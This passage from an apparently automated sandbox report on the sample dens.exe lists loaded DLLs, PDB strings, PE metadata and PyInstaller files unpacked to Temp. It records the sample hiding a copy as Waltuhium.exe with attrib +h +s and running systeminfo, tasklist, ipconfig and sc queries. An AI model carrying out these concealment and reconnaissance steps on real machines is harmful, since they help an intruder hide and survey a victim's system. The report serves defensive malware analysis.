            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
            Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
            Source: C:\Users\user\Desktop\dens.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
            Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\mshta.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
            Source: Window Recorder; Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: dens.exe; Static PE information: Image base 0x140000000 > 0x60000000
            Source: dens.exe; Static file information: File size 16905542 > 1048576
            Source: dens.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: dens.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: dens.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: dens.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: dens.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: dens.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: dens.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: dens.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665300726.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1663850239.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: dens.exe, 00000000.00000003.1666268915.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1666675608.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_uuid.pdb source: dens.exe, 00000000.00000003.1663289848.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, _uuid.pyd.0.dr
            Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: dens.exe, 00000000.00000003.1663365617.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, _wmi.pyd.0.dr
            Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: dens.exe, 00000000.00000003.1664454967.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665435710.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665300726.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb''&GCTL source: dens.exe, 00000000.00000003.1663365617.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, _wmi.pyd.0.dr
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mugnbzbx\mugnbzbx.pdb source: powershell.exe, 00000052.00000002.1892866312.00000217AE943000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: dens.exe, 00000000.00000003.1666061436.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: dens.exe, 00000000.00000003.1666519024.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: dens.exe, 00000000.00000003.1666130356.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: dens.exe, 00000000.00000003.1664659823.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: dens.exe, 00000000.00000003.1666432610.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: dens.exe, 00000000.00000003.1661110438.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: dens.exe, 00000000.00000003.1662659826.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665708925.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665435710.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1664385796.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1666196697.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1664318244.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: dens.exe, 00000000.00000003.1662453626.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665091592.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: dens.exe, 00000000.00000003.1664047310.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mugnbzbx\mugnbzbx.pdbhP" source: powershell.exe, 00000052.00000002.1892866312.00000217AE943000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: dens.exe, 00000000.00000003.1664117143.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: dens.exe, 00000000.00000003.1661560840.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: dens.exe, 00000000.00000003.1665506325.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1666268915.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665849743.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665708925.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1663915027.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: dens.exe, 00000000.00000003.1661942418.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1664047310.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: dens.exe, 00000000.00000003.1662940240.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: cryptography_rust.pdb source: dens.exe, 00000001.00000002.2068229135.00007FFDFA867000.00000002.00000001.01000000.00000026.sdmp
            Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665849743.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1666432610.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: dens.exe, 00000000.00000003.1661475799.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: dens.exe, 00000000.00000003.1691479731.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmp
            Source: Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665234767.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: dens.exe, 00000000.00000003.1664185093.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.0.dr
            Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: dens.exe, 00000000.00000003.1663915027.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665779625.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.0.dr
            Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: dens.exe, 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmp
            Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: dens.exe, 00000000.00000003.1666196697.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1664454967.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.0.dr
            Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1666130356.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: dens.exe, 00000000.00000003.1666675608.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665639486.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: dens.exe, 00000000.00000003.1665368820.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: dens.exe, 00000000.00000003.1664254134.00000107DAD65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: dens.exe, 00000000.00000003.1662552489.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: dens.exe, 00000000.00000003.1664523044.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: dens.exe, 00000000.00000003.1662872002.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1664725190.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1666353635.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: dens.exe, 00000000.00000003.1665157382.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.0.dr
            Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: dens.exe, 00000000.00000003.1673118322.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2057481054.000002D9AA8E0000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: dens.exe, 00000000.00000003.1665779625.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.0.dr
            Source: dens.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: dens.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: dens.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: dens.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: dens.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: VCRUNTIME140_1.dll.0.dr Static PE information: 0xFB76EAA0 [Mon Sep 10 13:35:28 2103 UTC]
            Source: VCRUNTIME140.dll.0.dr Static PE information: section name: fothk
            Source: VCRUNTIME140.dll.0.dr Static PE information: section name: _RDATA
            Source: libcrypto-3.dll.0.dr Static PE information: section name: .00cfg
            Source: libssl-3.dll.0.dr Static PE information: section name: .00cfg
            Source: python312.dll.0.dr Static PE information: section name: PyRuntim
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 82_2_00007FFD9A286329 push ecx; ret 82_2_00007FFD9A28632C

            Persistence and Installation Behavior

            Source: C:\Users\user\Desktop\dens.exe Process created: "C:\Users\user\Desktop\dens.exe"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\WaltuhiumUpdateService\Waltuhium.exe"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-time-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\unicodedata.pyd
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\cryptography\hazmat\bindings\_rust.pyd
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-file-l1-2-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-heap-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-locale-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\libcrypto-3.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-file-l2-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\_brotli.cp312-win_amd64.pyd
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-process-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-namedpipe-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-string-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\libffi-8.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\python312.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\WaltuhiumUpdateService\Waltuhium.exe
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\select.pyd
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-errorhandling-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-datetime-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\_sqlite3.pyd
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-runtime-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\yarl\_helpers_c.cp312-win_amd64.pyd
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\_uuid.pyd
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\VCRUNTIME140.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-math-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\_hashlib.pyd
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\aiohttp\_http_parser.cp312-win_amd64.pyd
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-synch-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\sqlite3.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\_cffi_backend.cp312-win_amd64.pyd
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\_lzma.pyd
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\_overlapped.pyd
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-debug-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\python3.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-processenvironment-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\_bz2.pyd
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-conio-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\_decimal.pyd
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\ucrtbase.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-rtlsupport-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-utility-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-heap-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\_ssl.pyd
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\frozenlist\_frozenlist.cp312-win_amd64.pyd
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-interlocked-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\aiohttp\_websocket.cp312-win_amd64.pyd
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-environment-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-string-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\libssl-3.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\yarl\_quoting_c.cp312-win_amd64.pyd
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-util-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-convert-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-memory-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-synch-l1-2-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-timezone-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-handle-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-sysinfo-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-file-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-filesystem-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-profile-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-processthreads-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-crt-stdio-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\_ctypes.pyd
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\_wmi.pyd
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\aiohttp\_http_writer.cp312-win_amd64.pyd
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\multidict\_multidict.cp312-win_amd64.pyd
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\_socket.pyd
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-localization-l1-2-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-processthreads-l1-1-1.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\VCRUNTIME140_1.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-console-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\aiohttp\_helpers.cp312-win_amd64.pyd
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\api-ms-win-core-libraryloader-l1-1-0.dll
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\_queue.pyd
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\_asyncio.pyd
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\pyexpat.pyd
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\_multiprocessing.pyd
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txt
            Source: C:\Users\user\Desktop\dens.exe File created: C:\Users\user\AppData\Local\Temp\_MEI62482\wheel-0.43.0.dist-info\LICENSE.txt
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc query type= service state= all
